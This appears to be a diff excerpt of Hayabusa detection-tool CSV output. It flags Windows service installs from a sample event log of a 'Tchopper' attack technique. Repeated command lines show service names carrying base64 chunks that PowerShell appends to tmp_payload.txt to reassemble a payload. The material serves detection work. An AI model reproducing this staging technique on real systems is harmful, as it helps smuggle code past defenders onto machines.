+2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:26.912 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:28.373 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:29.844 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:31.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AtICAkUGVyY2VudENvbXBsZXRlJSBDb21wbGV0ZSIgLXN0YXR1cyAiQ2FsY3VsYXRpbmcgRVBTIGZvciBDb21wdXRlcjogJENvbXB1dGVyIiAtcGVyY2VudENvbXBsZXRlICRQZXJjZW50Q29tcGxl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:32.740 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGUNCiAgICAgICAgfQ0KDQogICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkV2ZW50IExvZyBFU1AgUmVwb3J0IENhbGN1bGF0aW9ucyBDb21wbGV0ZSINCg0KICAgICAgICBSZXR1cm4gJFJlcG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:34.190 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ydA0KICAgICANCiAgICB9DQoNCiAgICBjYXRjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBDcmVhdGUgTG9nIFJlcG9ydCINCg0KICAgICAgICBXcml0ZS1M | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
